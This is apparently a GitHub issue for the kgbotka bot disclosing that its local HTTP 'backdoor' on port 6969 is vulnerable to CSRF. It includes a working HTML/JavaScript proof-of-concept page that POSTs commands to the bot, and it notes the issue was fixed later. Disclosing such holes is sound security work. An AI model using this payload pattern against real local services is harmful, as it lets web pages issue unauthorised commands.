kgbotka icon indicating copy to clipboard operation
kgbotka copied to clipboard

Published 20 hours ago verified publisher icon tsoding

Backdoor is vulnerable to CSRF attacks

Open rexim opened this issue 5 years ago • 1 comments

  • Start the bot
  • On the same machine open a browser and go to http://localhost:6969/
  • Observe the HTTP query from the browser in the kgbotka.log

rexim avatar Jun 18 '20 19:06 rexim

Exploit:

<!DOCTYPE html>
<html>
  <head>
    <title>Not an Exploit Kapp</title>
  </head>
  <body>
    <h1>Ya got CSRF-ed bruh LOOOOL</h1>
    <script>
      const form = new FormData();
      form.append('cd', 'cd #tsoding');
      form.append('say', 'say you got CSRF-ed :)');
      fetch("http://localhost:6969/", {
        method: 'POST',
        body: form
      });
    </script>
  </body>
</html>

UPD Does not work after #230

rexim avatar Jun 19 '20 18:06 rexim